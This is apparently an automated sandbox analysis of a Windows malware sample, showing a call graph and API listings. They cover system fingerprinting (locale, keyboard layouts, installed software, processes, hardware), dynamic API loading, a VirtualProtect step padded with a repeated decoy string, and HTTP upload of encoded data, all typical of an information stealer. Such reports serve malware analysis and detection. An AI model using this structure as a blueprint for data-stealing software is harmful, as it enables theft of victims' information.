15080->15081 15082 afa8a0 lstrcpy 15081->15082 15083 af1d2d 15082->15083 15084 afa9b0 4 API calls 15083->15084 15085 af1d4c 15084->15085 15086 afa8a0 lstrcpy 15085->15086 15087 af1d55 15086->15087 15088 afa9b0 4 API calls 15087->15088 15089 af1d75 15088->15089 15090 afa8a0 lstrcpy 15089->15090 15091 af1d7e 15090->15091 15092 af78e0 3 API calls 15091->15092 15093 af1d8e 15092->15093 15094 afa9b0 4 API calls 15093->15094 15095 af1d9e 15094->15095 15096 afa8a0 lstrcpy 15095->15096 15097 af1da7 15096->15097 15098 afa9b0 4 API calls 15097->15098 15099 af1dc6 15098->15099 15100 afa8a0 lstrcpy 15099->15100 15101 af1dcf 15100->15101 15102 afa9b0 4 API calls 15101->15102 15103 af1df0 15102->15103 15104 afa8a0 lstrcpy 15103->15104 15105 af1df9 15104->15105 15764 af7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15105->15764 15108 afa9b0 4 API calls 15109 af1e19 15108->15109 15110 afa8a0 lstrcpy 15109->15110 15111 af1e22 15110->15111 15112 afa9b0 4 API calls 15111->15112 15113 af1e41 15112->15113 15114 afa8a0 lstrcpy 15113->15114 15115 af1e4a 15114->15115 15116 afa9b0 4 API calls 15115->15116 15117 af1e6b 15116->15117 15118 afa8a0 lstrcpy 15117->15118 15119 af1e74 15118->15119 15766 af7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15119->15766 15122 afa9b0 4 API calls 15123 af1e94 15122->15123 15124 afa8a0 lstrcpy 15123->15124 15125 af1e9d 15124->15125 15126 afa9b0 4 API calls 15125->15126 15127 af1ebc 15126->15127 15128 afa8a0 lstrcpy 15127->15128 15129 af1ec5 15128->15129 15130 afa9b0 4 API calls 15129->15130 15131 af1ee5 15130->15131 15132 afa8a0 lstrcpy 15131->15132 15133 af1eee 15132->15133 15769 af7b00 GetUserDefaultLocaleName 15133->15769 15136 afa9b0 4 API calls 15137 af1f0e 15136->15137 15138 afa8a0 lstrcpy 15137->15138 15139 af1f17 15138->15139 15140 afa9b0 4 API calls 15139->15140 15141 af1f36 15140->15141 15142 afa8a0 lstrcpy 15141->15142 15143 af1f3f 15142->15143 15144 afa9b0 4 API calls 15143->15144 15145 af1f60 15144->15145 15146 afa8a0 lstrcpy 15145->15146 15147 af1f69 15146->15147 15773 af7b90 15147->15773 15149 af1f80 15150 afa920 3 API calls 15149->15150 15151 af1f93 15150->15151 15152 afa8a0 lstrcpy 15151->15152 15153 af1f9c 15152->15153 15154 afa9b0 4 API calls 15153->15154 15155 af1fc6 15154->15155 15156 afa8a0 lstrcpy 15155->15156 15157 af1fcf 15156->15157 15158 afa9b0 4 API calls 15157->15158 15159 af1fef 15158->15159 15160 afa8a0 lstrcpy 15159->15160 15161 af1ff8 15160->15161 15785 af7d80 GetSystemPowerStatus 15161->15785 15164 afa9b0 4 API calls 15165 af2018 15164->15165 15166 afa8a0 lstrcpy 15165->15166 15167 af2021 15166->15167 15168 afa9b0 4 API calls 15167->15168 15169 af2040 15168->15169 15170 afa8a0 lstrcpy 15169->15170 15171 af2049 15170->15171 15172 afa9b0 4 API calls 15171->15172 15173 af206a 15172->15173 15174 afa8a0 lstrcpy 15173->15174 15175 af2073 15174->15175 15176 af207e GetCurrentProcessId 15175->15176 15787 af9470 OpenProcess 15176->15787 15179 afa920 3 API calls 15180 af20a4 15179->15180 15181 afa8a0 lstrcpy 15180->15181 15182 af20ad 15181->15182 15183 afa9b0 4 API calls 15182->15183 15184 af20d7 15183->15184 15185 afa8a0 lstrcpy 15184->15185 15186 af20e0 15185->15186 15187 afa9b0 4 API calls 15186->15187 15188 af2100 15187->15188 15189 afa8a0 lstrcpy 15188->15189 15190 af2109 15189->15190 15792 af7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15190->15792 15193 afa9b0 4 API calls 15194 af2129 15193->15194 15195 afa8a0 lstrcpy 15194->15195 15196 af2132 15195->15196 15197 afa9b0 4 API calls 15196->15197 15198 af2151 15197->15198 15199 afa8a0 lstrcpy 15198->15199 15200 af215a 15199->15200 15201 afa9b0 4 API calls 15200->15201 15202 af217b 15201->15202 15203 afa8a0 lstrcpy 15202->15203 15204 af2184 15203->15204 15796 af7f60 15204->15796 15207 afa9b0 4 API calls 15208 af21a4 15207->15208 15209 afa8a0 lstrcpy 15208->15209 15210 af21ad 15209->15210 15211 afa9b0 4 API calls 15210->15211 15212 af21cc 15211->15212 15213 afa8a0 lstrcpy 15212->15213 15214 af21d5 15213->15214 15215 afa9b0 4 API calls 15214->15215 15216 af21f6 15215->15216 15217 afa8a0 lstrcpy 15216->15217 15218 af21ff 15217->15218 15809 af7ed0 GetSystemInfo wsprintfA 15218->15809 15221 afa9b0 4 API calls 15222 af221f 15221->15222 15223 afa8a0 lstrcpy 15222->15223 15224 af2228 15223->15224 15225 afa9b0 4 API calls 15224->15225 15226 af2247 15225->15226 15227 afa8a0 lstrcpy 15226->15227 15228 af2250 15227->15228 15229 afa9b0 4 API calls 15228->15229 15230 af2270 15229->15230 15231 afa8a0 lstrcpy 15230->15231 15232 af2279 15231->15232 15811 af8100 GetProcessHeap RtlAllocateHeap 15232->15811 15235 afa9b0 4 API calls 15236 af2299 15235->15236 15237 afa8a0 lstrcpy 15236->15237 15238 af22a2 15237->15238 15239 afa9b0 4 API calls 15238->15239 15240 af22c1 15239->15240 15241 afa8a0 lstrcpy 15240->15241 15242 af22ca 15241->15242 15243 afa9b0 4 API calls 15242->15243 15244 af22eb 15243->15244 15245 afa8a0 lstrcpy 15244->15245 15246 af22f4 15245->15246 15817 af87c0 15246->15817 15249 afa920 3 API calls 15250 af231e 15249->15250 15251 afa8a0 lstrcpy 15250->15251 15252 af2327 15251->15252 15253 afa9b0 4 API calls 15252->15253 15254 af2351 15253->15254 15255 afa8a0 lstrcpy 15254->15255 15256 af235a 15255->15256 15257 afa9b0 4 API calls 15256->15257 15258 af237a 15257->15258 15259 afa8a0 lstrcpy 15258->15259 15260 af2383 15259->15260 15261 afa9b0 4 API calls 15260->15261 15262 af23a2 15261->15262 15263 afa8a0 lstrcpy 15262->15263 15264 af23ab 15263->15264 15822 af81f0 15264->15822 15266 af23c2 15267 afa920 3 API calls 15266->15267 15268 af23d5 15267->15268 15269 afa8a0 lstrcpy 15268->15269 15270 af23de 15269->15270 15271 afa9b0 4 API calls 15270->15271 15272 af240a 15271->15272 15273 afa8a0 lstrcpy 15272->15273 15274 af2413 15273->15274 15275 afa9b0 4 API calls 15274->15275 15276 af2432 15275->15276 15277 afa8a0 lstrcpy 15276->15277 15278 af243b 15277->15278 15279 afa9b0 4 API calls 15278->15279 15280 af245c 15279->15280 15281 afa8a0 lstrcpy 15280->15281 15282 af2465 15281->15282 15283 afa9b0 4 API calls 15282->15283 15284 af2484 15283->15284 15285 afa8a0 lstrcpy 15284->15285 15286 af248d 15285->15286 15287 afa9b0 4 API calls 15286->15287 15288 af24ae 15287->15288 15289 afa8a0 lstrcpy 15288->15289 15290 af24b7 15289->15290 15830 af8320 15290->15830 15292 af24d3 15293 afa920 3 API calls 15292->15293 15294 af24e6 15293->15294 15295 afa8a0 lstrcpy 15294->15295 15296 af24ef 15295->15296 15297 afa9b0 4 API calls 15296->15297 15298 af2519 15297->15298 15299 afa8a0 lstrcpy 15298->15299 15300 af2522 15299->15300 15301 afa9b0 4 API calls 15300->15301 15302 af2543 15301->15302 15303 afa8a0 lstrcpy 15302->15303 15304 af254c 15303->15304 15305 af8320 17 API calls 15304->15305 15306 af2568 15305->15306 15307 afa920 3 API calls 15306->15307 15308 af257b 15307->15308 15309 afa8a0 lstrcpy 15308->15309 15310 af2584 15309->15310 15311 afa9b0 4 API calls 15310->15311 15312 af25ae 15311->15312 15313 afa8a0 lstrcpy 15312->15313 15314 af25b7 15313->15314 15315 afa9b0 4 API calls 15314->15315 15316 af25d6 15315->15316 15317 afa8a0 lstrcpy 15316->15317 15318 af25df 15317->15318 15319 afa9b0 4 API calls 15318->15319 15320 af2600 15319->15320 15321 afa8a0 lstrcpy 15320->15321 15322 af2609 15321->15322 15866 af8680 15322->15866 15324 af2620 15325 afa920 3 API calls 15324->15325 15326 af2633 15325->15326 15327 afa8a0 lstrcpy 15326->15327 15328 af263c 15327->15328 15329 af265a lstrlen 15328->15329 15330 af266a 15329->15330 15331 afa740 lstrcpy 15330->15331 15332 af267c 15331->15332 15333 ae1590 lstrcpy 15332->15333 15334 af268d 15333->15334 15876 af5190 15334->15876 15336 af2699 15336->13767 16064 afaad0 15337->16064 15339 ae5009 InternetOpenUrlA 15343 ae5021 15339->15343 15340 ae502a InternetReadFile 15340->15343 15341 ae50a0 InternetCloseHandle InternetCloseHandle 15342 ae50ec 15341->15342 15342->13771 15343->15340 15343->15341 16065 ae98d0 15344->16065 15346 af0759 15347 af077d 15346->15347 15348 af0a38 15346->15348 15351 af0799 StrCmpCA 15347->15351 15349 ae1590 lstrcpy 15348->15349 15350 af0a49 15349->15350 16241 af0250 15350->16241 15352 af0843 15351->15352 15353 af07a8 15351->15353 15358 af0865 StrCmpCA 15352->15358 15355 afa7a0 lstrcpy 15353->15355 15357 af07c3 15355->15357 15359 ae1590 lstrcpy 15357->15359 15360 af0874 15358->15360 15396 af096b 15358->15396 15361 af080c 15359->15361 15362 afa740 lstrcpy 15360->15362 15364 afa7a0 lstrcpy 15361->15364 15363 af0881 15362->15363 15366 afa9b0 4 API calls 15363->15366 15367 af0823 15364->15367 15365 af099c StrCmpCA 15368 af09ab 15365->15368 15369 af0a2d 15365->15369 15371 af08ac 15366->15371 15372 afa7a0 lstrcpy 15367->15372 15370 ae1590 lstrcpy 15368->15370 15369->13775 15373 af09f4 15370->15373 15374 afa920 3 API calls 15371->15374 15375 af083e 15372->15375 15376 afa7a0 lstrcpy 15373->15376 15377 af08b3 15374->15377 16068 aefb00 15375->16068 15379 af0a0d 15376->15379 15380 afa9b0 4 API calls 15377->15380 15381 afa7a0 lstrcpy 15379->15381 15382 af08ba 15380->15382 15383 af0a28 15381->15383 15396->15365 15716 afa7a0 lstrcpy 15715->15716 15717 ae1683 15716->15717 15718 afa7a0 lstrcpy 15717->15718 15719 ae1695 15718->15719 15720 afa7a0 lstrcpy 15719->15720 15721 ae16a7 15720->15721 15722 afa7a0 lstrcpy 15721->15722 15723 ae15a3 15722->15723 15723->14598 15725 ae47c6 15724->15725 15726 ae4838 lstrlen 15725->15726 15750 afaad0 15726->15750 15728 ae4848 InternetCrackUrlA 15729 ae4867 15728->15729 15729->14675 15731 ae4eee 15730->15731 15732 ae9af9 LocalAlloc 15730->15732 15731->14697 15731->14702 15732->15731 15733 ae9b14 CryptStringToBinaryA 15732->15733 15733->15731 15734 ae9b39 LocalFree 15733->15734 15734->15731 15736 afa740 lstrcpy 15735->15736 15737 af8b74 15736->15737 15738 afa740 lstrcpy 15737->15738 15739 af8b82 GetSystemTime 15738->15739 15740 af8b99 15739->15740 15741 afa7a0 lstrcpy 15740->15741 15742 af8bfc 15741->15742 15742->14691 15744 afa931 15743->15744 15745 afa988 15744->15745 15747 afa968 lstrcpy lstrcat 15744->15747 15746 afa7a0 lstrcpy 15745->15746 15748 afa994 15746->15748 15747->15745 15748->14694 15749->14809 15750->15728 15751->14819 15752->14960 15753->14962 15754->14970 15883 af77a0 15755->15883 15758 af1c1e 15758->15052 15759 af76c6 RegOpenKeyExA 15760 af76e7 RegQueryValueExA 15759->15760 15761 af7704 RegCloseKey 15759->15761 15760->15761 15761->15758 15763 af1c99 15762->15763 15763->15066 15765 af1e09 15764->15765 15765->15108 15767 af7a9a wsprintfA 15766->15767 15768 af1e84 15766->15768 15767->15768 15768->15122 15770 af7b4d 15769->15770 15771 af1efe 15769->15771 15890 af8d20 LocalAlloc CharToOemW 15770->15890 15771->15136 15774 afa740 lstrcpy 15773->15774 15775 af7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15774->15775 15776 af7c25 15775->15776 15777 af7d18 15776->15777 15778 af7c46 GetLocaleInfoA 15776->15778 15781 afa9b0 lstrcpy lstrlen lstrcpy lstrcat 15776->15781 15784 afa8a0 lstrcpy 15776->15784 15779 af7d1e LocalFree 15777->15779 15780 af7d28 15777->15780 15778->15776 15779->15780 15782 afa7a0 lstrcpy 15780->15782 15781->15776 15783 af7d37 15782->15783 15783->15149 15784->15776 15786 af2008 15785->15786 15786->15164 15788 af94b5 15787->15788 15789 af9493 GetModuleFileNameExA CloseHandle 15787->15789 15790 afa740 lstrcpy 15788->15790 15789->15788 15791 af2091 15790->15791 15791->15179 15793 af7e68 RegQueryValueExA 15792->15793 15794 af2119 15792->15794 15795 af7e8e RegCloseKey 15793->15795 15794->15193 15795->15794 15797 af7fb9 GetLogicalProcessorInformationEx 15796->15797 15798 af7fd8 GetLastError 15797->15798 15803 af8029 15797->15803 15806 af8022 15798->15806 15808 af7fe3 15798->15808 15799 af2194 15799->15207 15802 af89f0 2 API calls 15802->15799 15804 af89f0 2 API calls 15803->15804 15805 af807b 15804->15805 15805->15806 15807 af8084 wsprintfA 15805->15807 15806->15799 15806->15802 15807->15799 15808->15797 15808->15799 15891 af89f0 15808->15891 15894 af8a10 GetProcessHeap RtlAllocateHeap 15808->15894 15810 af220f 15809->15810 15810->15221 15812 af89b0 15811->15812 15813 af814d GlobalMemoryStatusEx 15812->15813 15815 af8163 __aulldiv 15813->15815 15814 af819b wsprintfA 15816 af2289 15814->15816 15815->15814 15816->15235 15818 af87fb GetProcessHeap RtlAllocateHeap wsprintfA 15817->15818 15820 afa740 lstrcpy 15818->15820 15821 af230b 15820->15821 15821->15249 15823 afa740 lstrcpy 15822->15823 15827 af8229 15823->15827 15824 af8263 15826 afa7a0 lstrcpy 15824->15826 15825 afa9b0 lstrcpy lstrlen lstrcpy lstrcat 15825->15827 15828 af82dc 15826->15828 15827->15824 15827->15825 15829 afa8a0 lstrcpy 15827->15829 15828->15266 15829->15827 15831 afa740 lstrcpy 15830->15831 15832 af835c RegOpenKeyExA 15831->15832 15833 af83ae 15832->15833 15834 af83d0 15832->15834 15835 afa7a0 lstrcpy 15833->15835 15836 af83f8 RegEnumKeyExA 15834->15836 15837 af8613 RegCloseKey 15834->15837 15846 af83bd 15835->15846 15839 af843f wsprintfA RegOpenKeyExA 15836->15839 15840 af860e 15836->15840 15838 afa7a0 lstrcpy 15837->15838 15838->15846 15841 af8485 RegCloseKey RegCloseKey 15839->15841 15842 af84c1 RegQueryValueExA 15839->15842 15840->15837 15845 afa7a0 lstrcpy 15841->15845 15843 af84fa lstrlen 15842->15843 15844 af8601 RegCloseKey 15842->15844 15843->15844 15847 af8510 15843->15847 15844->15840 15845->15846 15846->15292 15848 afa9b0 4 API calls 15847->15848 15849 af8527 15848->15849 15850 afa8a0 lstrcpy 15849->15850 15851 af8533 15850->15851 15852 afa9b0 4 API calls 15851->15852 15853 af8557 15852->15853 15854 afa8a0 lstrcpy 15853->15854 15855 af8563 15854->15855 15856 af856e RegQueryValueExA 15855->15856 15856->15844 15857 af85a3 15856->15857 15858 afa9b0 4 API calls 15857->15858 15859 af85ba 15858->15859 15860 afa8a0 lstrcpy 15859->15860 15861 af85c6 15860->15861 15862 afa9b0 4 API calls 15861->15862 15863 af85ea 15862->15863 15864 afa8a0 lstrcpy 15863->15864 15865 af85f6 15864->15865 15865->15844 15867 afa740 lstrcpy 15866->15867 15868 af86bc CreateToolhelp32Snapshot Process32First 15867->15868 15869 af875d CloseHandle 15868->15869 15870 af86e8 Process32Next 15868->15870 15871 afa7a0 lstrcpy 15869->15871 15870->15869 15875 af86fd 15870->15875 15874 af8776 15871->15874 15872 afa9b0 lstrcpy lstrlen lstrcpy lstrcat 15872->15875 15873 afa8a0 lstrcpy 15873->15875 15874->15324 15875->15870 15875->15872 15875->15873 15877 afa7a0 lstrcpy 15876->15877 15878 af51b5 15877->15878 15879 ae1590 lstrcpy 15878->15879 15880 af51c6 15879->15880 15895 ae5100 15880->15895 15882 af51cf 15882->15336 15886 af7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15883->15886 15885 af76b9 15885->15758 15885->15759 15887 af7765 RegQueryValueExA 15886->15887 15888 af7780 RegCloseKey 15886->15888 15887->15888 15889 af7793 15888->15889 15889->15885 15890->15771 15892 af8a0c 15891->15892 15893 af89f9 GetProcessHeap HeapFree 15891->15893 15892->15808 15893->15892 15894->15808 15896 afa7a0 lstrcpy 15895->15896 15897 ae5119 15896->15897 15898 ae47b0 2 API calls 15897->15898 15899 ae5125 15898->15899 16055 af8ea0 15899->16055 15901 ae5184 15902 ae5192 lstrlen 15901->15902 15903 ae51a5 15902->15903 15904 af8ea0 4 API calls 15903->15904 15905 ae51b6 15904->15905 15906 afa740 lstrcpy 15905->15906 15907 ae51c9 15906->15907 15908 afa740 lstrcpy 15907->15908 15909 ae51d6 15908->15909 15910 afa740 lstrcpy 15909->15910 15911 ae51e3 15910->15911 15912 afa740 lstrcpy 15911->15912 15913 ae51f0 15912->15913 15914 afa740 lstrcpy 15913->15914 15915 ae51fd InternetOpenA StrCmpCA 15914->15915 15916 ae522f 15915->15916 15917 ae58c4 InternetCloseHandle 15916->15917 15918 af8b60 3 API calls 15916->15918 15924 ae58d9 codecvt 15917->15924 15919 ae524e 15918->15919 15920 afa920 3 API calls 15919->15920 15921 ae5261 15920->15921 15922 afa8a0 lstrcpy 15921->15922 15923 ae526a 15922->15923 15925 afa9b0 4 API calls 15923->15925 15928 afa7a0 lstrcpy 15924->15928 15926 ae52ab 15925->15926 15927 afa920 3 API calls 15926->15927 15929 ae52b2 15927->15929 15936 ae5913 15928->15936 15930 afa9b0 4 API calls 15929->15930 15931 ae52b9 15930->15931 15932 afa8a0 lstrcpy 15931->15932 15933 ae52c2 15932->15933 15934 afa9b0 4 API calls 15933->15934 15935 ae5303 15934->15935 15937 afa920 3 API calls 15935->15937 15936->15882 15938 ae530a 15937->15938 15939 afa8a0 lstrcpy 15938->15939 15940 ae5313 15939->15940 15941 ae5329 InternetConnectA 15940->15941 15941->15917 15942 ae5359 HttpOpenRequestA 15941->15942 15944 ae58b7 InternetCloseHandle 15942->15944 15945 ae53b7 15942->15945 15944->15917 15946 afa9b0 4 API calls 15945->15946 15947 ae53cb 15946->15947 15948 afa8a0 lstrcpy 15947->15948 15949 ae53d4 15948->15949 15950 afa920 3 API calls 15949->15950 15951 ae53f2 15950->15951 15952 afa8a0 lstrcpy 15951->15952 15953 ae53fb 15952->15953 15954 afa9b0 4 API calls 15953->15954 15955 ae541a 15954->15955 15956 afa8a0 lstrcpy 15955->15956 15957 ae5423 15956->15957 15958 afa9b0 4 API calls 15957->15958 15959 ae5444 15958->15959 15960 afa8a0 lstrcpy 15959->15960 15961 ae544d 15960->15961 15962 afa9b0 4 API calls 15961->15962 15963 ae546e 15962->15963 16056 af8ead CryptBinaryToStringA 16055->16056 16060 af8ea9 16055->16060 16057 af8ece GetProcessHeap RtlAllocateHeap 16056->16057 16056->16060 16058 af8ef4 codecvt 16057->16058 16057->16060 16059 af8f05 CryptBinaryToStringA 16058->16059 16059->16060 16060->15901 16064->15339 16307 ae9880 16065->16307 16067 ae98e1 16067->15346 16069 afa740 lstrcpy 16068->16069 16070 aefb16 16069->16070 16242 afa740 lstrcpy 16241->16242 16243 af0266 16242->16243 16244 af8de0 2 API calls 16243->16244 16245 af027b 16244->16245 16246 afa920 3 API calls 16245->16246 16247 af028b 16246->16247 16248 afa8a0 lstrcpy 16247->16248 16249 af0294 16248->16249 16250 afa9b0 4 API calls 16249->16250 16308 ae988d 16307->16308 16311 ae6fb0 16308->16311 16310 ae98ad codecvt 16310->16067 16314 ae6d40 16311->16314 16315 ae6d63 16314->16315 16329 ae6d59 16314->16329 16330 ae6530 16315->16330 16319 ae6dbe 16319->16329 16340 ae69b0 16319->16340 16321 ae6e2a 16322 ae6ee6 VirtualFree 16321->16322 16324 ae6ef7 16321->16324 16321->16329 16322->16324 16323 ae6f41 16327 af89f0 2 API calls 16323->16327 16323->16329 16324->16323 16325 ae6f38 16324->16325 16326 ae6f26 FreeLibrary 16324->16326 16328 af89f0 2 API calls 16325->16328 16326->16324 16327->16329 16328->16323 16329->16310 16331 ae6542 16330->16331 16333 ae6549 16331->16333 16350 af8a10 GetProcessHeap RtlAllocateHeap 16331->16350 16333->16329 16334 ae6660 16333->16334 16337 ae668f VirtualAlloc 16334->16337 16336 ae6730 16338 ae673c 16336->16338 16339 ae6743 VirtualAlloc 16336->16339 16337->16336 16337->16338 16338->16319 16339->16338 16341 ae69c9 16340->16341 16345 ae69d5 16340->16345 16342 ae6a09 LoadLibraryA 16341->16342 16341->16345 16343 ae6a32 16342->16343 16342->16345 16347 ae6ae0 16343->16347 16351 af8a10 GetProcessHeap RtlAllocateHeap 16343->16351 16345->16321 16346 ae6ba8 GetProcAddress 16346->16345 16346->16347 16347->16345 16347->16346 16348 af89f0 2 API calls 16348->16347 16349 ae6a8b 16349->16345 16349->16348 16350->16333 16351->16349

                          Executed Functions

                          Function 00AF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 af9860-af9874 call af9750 663 af987a-af9a8e call af9780 GetProcAddress * 21 660->663 664 af9a93-af9af2 LoadLibraryA * 5 660->664 663->664 665 af9b0d-af9b14 664->665 666 af9af4-af9b08 GetProcAddress 664->666 668 af9b46-af9b4d 665->668 669 af9b16-af9b41 GetProcAddress * 2 665->669 666->665 671 af9b4f-af9b63 GetProcAddress 668->671 672 af9b68-af9b6f 668->672 669->668 671->672 673 af9b89-af9b90 672->673 674 af9b71-af9b84 GetProcAddress 672->674 675 af9b92-af9bbc GetProcAddress * 2 673->675 676 af9bc1-af9bc2 673->676 674->673 675->676
                          APIs
                          • GetProcAddress.KERNEL32(75550000,01790650), ref: 00AF98A1
                          • GetProcAddress.KERNEL32(75550000,01790668), ref: 00AF98BA
                          • GetProcAddress.KERNEL32(75550000,01790680), ref: 00AF98D2
                          • GetProcAddress.KERNEL32(75550000,01790758), ref: 00AF98EA
                          • GetProcAddress.KERNEL32(75550000,01790530), ref: 00AF9903
                          • GetProcAddress.KERNEL32(75550000,01798B48), ref: 00AF991B
                          • GetProcAddress.KERNEL32(75550000,01785548), ref: 00AF9933
                          • GetProcAddress.KERNEL32(75550000,017854A8), ref: 00AF994C
                          • GetProcAddress.KERNEL32(75550000,017906E0), ref: 00AF9964
                          • GetProcAddress.KERNEL32(75550000,01790710), ref: 00AF997C
                          • GetProcAddress.KERNEL32(75550000,01790548), ref: 00AF9995
                          • GetProcAddress.KERNEL32(75550000,01790740), ref: 00AF99AD
                          • GetProcAddress.KERNEL32(75550000,01785288), ref: 00AF99C5
                          • GetProcAddress.KERNEL32(75550000,01790770), ref: 00AF99DE
                          • GetProcAddress.KERNEL32(75550000,01790788), ref: 00AF99F6
                          • GetProcAddress.KERNEL32(75550000,01785328), ref: 00AF9A0E
                          • GetProcAddress.KERNEL32(75550000,01790560), ref: 00AF9A27
                          • GetProcAddress.KERNEL32(75550000,01790890), ref: 00AF9A3F
                          • GetProcAddress.KERNEL32(75550000,01785488), ref: 00AF9A57
                          • GetProcAddress.KERNEL32(75550000,01790860), ref: 00AF9A70
                          • GetProcAddress.KERNEL32(75550000,01785348), ref: 00AF9A88
                          • LoadLibraryA.KERNEL32(01790848,?,00AF6A00), ref: 00AF9A9A
                          • LoadLibraryA.KERNEL32(01790878,?,00AF6A00), ref: 00AF9AAB
                          • LoadLibraryA.KERNEL32(017908A8,?,00AF6A00), ref: 00AF9ABD
                          • LoadLibraryA.KERNEL32(017908C0,?,00AF6A00), ref: 00AF9ACF
                          • LoadLibraryA.KERNEL32(01790818,?,00AF6A00), ref: 00AF9AE0
                          • GetProcAddress.KERNEL32(75670000,01790800), ref: 00AF9B02
                          • GetProcAddress.KERNEL32(75750000,01790830), ref: 00AF9B23
                          • GetProcAddress.KERNEL32(75750000,01798C78), ref: 00AF9B3B
                          • GetProcAddress.KERNEL32(76BE0000,01798DF8), ref: 00AF9B5D
                          • GetProcAddress.KERNEL32(759D0000,017852E8), ref: 00AF9B7E
                          • GetProcAddress.KERNEL32(773F0000,01798A08), ref: 00AF9B9F
                          • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00AF9BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00AF9BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 08aa8bc7aef023abc1c240a1937d602bd9c25fbbd23a9d3ee6a107b800985455
                          • Instruction ID: ff3245d45ee0e6bbe0e2625417f91a98e2bfdb67dc9536201229d35d0ce304db
                          • Opcode Fuzzy Hash: 08aa8bc7aef023abc1c240a1937d602bd9c25fbbd23a9d3ee6a107b800985455
                          • Instruction Fuzzy Hash: D2A128B55003409FD364EFACEE88A6677F9F76C601704492AE619C3364D739A843CB7A
                          Function 00AE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 ae45c0-ae4695 RtlAllocateHeap 781 ae46a0-ae46a6 764->781 782 ae474f-ae47a9 VirtualProtect 781->782 783 ae46ac-ae474a 781->783 783->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE460E
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AE479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE46AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE4678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE45D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AE475A
